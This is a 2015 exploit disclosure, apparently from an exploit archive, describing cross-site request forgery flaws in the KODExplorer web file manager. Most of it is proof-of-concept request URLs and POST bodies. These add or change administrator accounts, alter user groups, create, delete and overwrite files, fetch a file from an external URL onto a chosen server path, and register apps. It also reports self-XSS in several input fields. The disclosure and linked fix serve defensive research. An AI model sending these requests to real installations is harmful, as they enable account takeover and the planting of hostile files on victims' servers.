================================================================================
# KODExplorer web file manager - Cross Site Request Foreign
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
Description : there is no CSRF token protection on the user management area , an attacker can use the
POC bellow to add , edit , remove any user by sending a link to logged in user with User Management privilege
# PoC :
Add user :
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator
Delete User:
http://localhost/index.php?member/del&name=[username]
Edit User:
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]
Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
Additional CSRF Issues:
I - CSRF Group Managment :
Description : an attacker can add , remove or edit any User Group by sending an exploit link to a loggeed in admin.
Vulnerable Controller : group.class.php
Proof of Concept :
#Add Group : POST Request
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
#Edit Group : POST Request
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
#Delete Group : http://localhost/index.php?group/del&role=[group_name]
------------------------------------------------------------------------
II - CSRF on File Managment :
Description : an attacker can add , upload file from external site , delete or edit file/path by sending a link to a logged in administrator.
Vulnerable Controller : explorer.class.php
Proof of Concept :
#Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]
#Delete file : POST Request
action URL: http://localhost/index.php?explorer/pathDelete
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]
#Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]
#Edit file : POST Request
action URL:POST http://localhost/index.php?editor/fileSave
Post Data: path[path to file]\ncharset[utf-8]\nfilestr[[file content]]
------------------------------------------------------------------------
III - CSRF on App Managment :
Description : an attacker can add, edit , remove any app by sending a link to a logged in admin.
Vulnerable Controller : app.class.php
Proof of Concept :
#Add app : POST request
action url : http://localhost/index.php?app/add&name=a
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]
#Delete App : http://localhost/index.php?app/del&name=[your app]
-------------------------------------------------------------------------
IV - Multiple Self XSS:
Description : the KODExplorer suffer from many Self XSS, vulnerable module to XSS are , Username , App Name , App Source , Folder Name , File Name , Group Name. to execute it just inject html code as one of the vulnerable module above.
-------------------------------------------------------------------------
V - Solution :
I have released a fix on my github account you can clone it or just wait for a patch to be released on the next version as i have reported all possible vulnerability ,
-------------------------------------------------------------------------
Thanks : I want to say "thank you" for:
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
- Arab Oracle Users Group (@araboug) http://www.araboug.org
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.
Special Greetz to my fiancy.
